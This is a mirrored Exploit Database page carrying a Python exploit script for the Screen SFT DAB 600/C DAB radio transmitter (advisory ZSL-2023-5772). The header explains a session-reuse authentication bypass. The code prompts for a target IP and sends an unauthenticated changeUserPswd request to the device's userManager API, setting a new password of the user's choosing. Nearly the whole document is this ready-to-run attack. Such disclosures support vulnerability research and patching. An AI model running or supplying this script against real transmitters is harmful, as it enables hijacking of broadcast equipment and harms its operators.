Screen SFT DAB 600/C – Authentication Bypass Password Change

• Exploit Database
• 18 阅读

• 作者： LiquidWorm
  日期： 2023-05-23
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51456/

• #!/usr/bin/env python3
  #
  # Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Password Change
  # Exploit Author: LiquidWorm
  #
  #
  # Vendor: DB Elettronica Telecomunicazioni SpA
  # Product web page: https://www.screen.it | https://www.dbbroadcast.com
  # https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
  # Affected version: Firmware: 1.9.3
  # Bios firmware: 7.1 (Apr 19 2021)
  # Gui: 2.46
  # FPGA: 169.55
  # uc: 6.15
  #
  # Summary: Screen's new radio DAB Transmitter is reaching the highest
  # technology level in both Digital Signal Processing and RF domain.
  # SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
  # digital adaptive precorrection and configuatio flexibility, the Hot
  # Swap System technology, the compactness and the smart system design,
  # the SFT DAB are advanced transmitters. They support standards DAB,
  # DAB+ and T-DMB and are compatible with major headend brands.
  #
  # Desc: The application suffers from a weak session management that can
  # allow an attacker on the same network to bypass these controls by reusing
  # the same IP address assigned to the victim user (NAT) and exploit crucial
  # operations on the device itself. By abusing the IP address property that
  # is binded to the Session ID, one needs to await for such an established
  # session and issue unauthorized requests to the vulnerable API to manage
  # and/or manipulate the affected transmitter.
  #
  # Tested on: Keil-EWEB/2.1
  #MontaVista® Linux® Carrier Grade eXpress (CGX)
  #
  #
  # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  # @zeroscience
  #
  #
  # Advisory ID: ZSL-2023-5772
  # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php
  #
  #
  # 19.03.2023
  #
  
  import hashlib,datetime##########
  import requests,colorama#########
  from colorama import Fore, Style#
  colorama.init()
  print(Fore.RED+Style.BRIGHT+
  '''
  █████████████ ██████ ██ █████ █████████████ ██████
  ██ ██ ██████████ ██ ████ ██ ██ ██ ████ ██ 
  ███████████ ██ ████ ██ ██ ██ ████ ██ ██ █████ ██████
  ██ ██ ████████ ██ ████ ██ ██ ██ ████ ██ 
  ██ ██ ███████ ████ ██ ██ ████ █████████████ ██ ██ 
  '''
  +Style.RESET_ALL)
  print(Fore.WHITE+Style.BRIGHT+
  '''
  ZSL and the Producers insist that no one
   submit any exploits of themselfs or others
  performing any dangerous activities.
   We will not open or view them.
  '''
  +Style.RESET_ALL)
  s=datetime.datetime.now()
  s=s.strftime('%d.%m.%Y %H:%M:%S')
  print('Starting API XPL -',s)
  t=input('Enter transmitter ip: ')
  u=input('Enter desired username: ')
  p=input('Enter desired password: ')
  e='/system/api/userManager.cgx'
  m5=hashlib.md5()
  m5.update(p.encode('utf-8'))
  h=m5.hexdigest()
  print('Your sig:',h)
  print('Calling object: ssbtObj')
  print('CGX fastcall: userManager::changeUserPswd')
  t='http://'+t+e
  bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
  'Accept':'application/json, text/plain, */*',
  'Accept-Language':'ku-MK,en;q=0.9',
  'Accept-Encoding':'gzip, deflate',
  'User-Agent':'Dabber+',
  'Connection':'close'}
  j={'ssbtIdx':0,
   'ssbtType':'userManager',
   'ssbtObj':{
   'changeUserPswd':{
  'username':u,
  'password':h
  }
   },
   }
  r=requests.post(t,headers=bh,json=j)
  if r.status_code==200:
  print('Done.')
  else:
  print('Error')
  exit(-4)